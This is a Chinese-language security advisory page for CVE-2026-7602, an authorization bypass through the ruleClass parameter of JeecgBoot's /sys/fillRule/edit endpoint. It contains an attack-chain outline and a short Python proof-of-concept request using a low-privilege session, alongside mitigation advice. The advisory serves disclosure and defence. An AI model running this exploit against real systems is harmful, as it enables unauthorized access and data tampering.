IPBUF安全漏洞报告
English
CVE-2026-7602 CVSS 6.3 中危

CVE-2026-7602 JeecgBoot授权不当漏洞

披露日期: 2026-05-02
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-7602
漏洞类型
授权不当
CVSS评分
6.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
JeecgBoot

相关标签

JeecgBootAuthorization BypassAccess ControlCVE-2026-7602

漏洞概述

JeecgBoot在3.9.1及之前版本中存在授权不当漏洞。该漏洞位于`/sys/fillRule/edit`接口的`FillRuleUtil`组件中。攻击者可通过操纵`ruleClass`参数绕过权限检查。由于该漏洞可被远程利用且有公开利用代码,建议尽快升级。

技术细节

该漏洞的根源在于JeecgBoot框架中`FillRuleUtil`组件对用户输入处理的逻辑缺陷。具体来说,当系统处理`/sys/fillRule/edit`接口的请求时,直接接收了前端提交的`ruleClass`参数,并将其用于后续的业务逻辑处理,而未在处理前对当前用户的会话权限与该参数所代表的操作权限进行一致性校验。这种设计上的疏忽允许攻击者通过篡改请求包中的`ruleClass`值,欺骗后端服务器执行原本需要更高权限才能触发的功能。由于攻击向量为网络(AV:N),且无需用户交互(UI:N),只要攻击者拥有低权限账号(PR:L),即可远程发起攻击,成功利用后可能导致敏感信息泄露(C:L)、数据篡改(I:L)或服务中断(A:L)。

攻击链分析

STEP 1
1. 信息收集
攻击者识别出目标系统使用的是JeecgBoot框架,且版本在3.9.1及以下。
STEP 2
2. 获取低权限账号
攻击者注册或获取一个普通低权限用户的账号凭证(PR:L)。
STEP 3
3. 发起攻击请求
攻击者构造恶意HTTP POST请求发送至`/sys/fillRule/edit`,并在请求体中篡改`ruleClass`参数。
STEP 4
4. 权限绕过
后端服务器由于验证缺陷,执行了未授权的操作,导致数据泄露或修改。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL url = "http://target-ip:port/sys/fillRule/edit" # Headers (Low privilege user session) headers = { "User-Agent": "Mozilla/5.0", "Content-Type": "application/json", "Cookie": "JSESSIONID=LOW_PRIVILEGE_SESSION_ID" } # Payload manipulating the ruleClass parameter payload = { "id": "test_id", "ruleClass": "com.example.malicious.Class" # Manipulated argument } try: response = requests.post(url, json=payload, headers=headers, timeout=10) if response.status_code == 200: print("[+] Exploit successful, authorization bypassed.") print(response.text) else: print("[-] Exploit failed.") except Exception as e: print(f"Error: {e}")

影响范围

JeecgBoot <= 3.9.1

防御指南

临时缓解措施
在升级之前,建议通过WAF(Web应用防火墙)添加规则,拦截对`/sys/fillRule/edit`接口的非常规请求,或暂时禁用该功能接口以降低风险。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表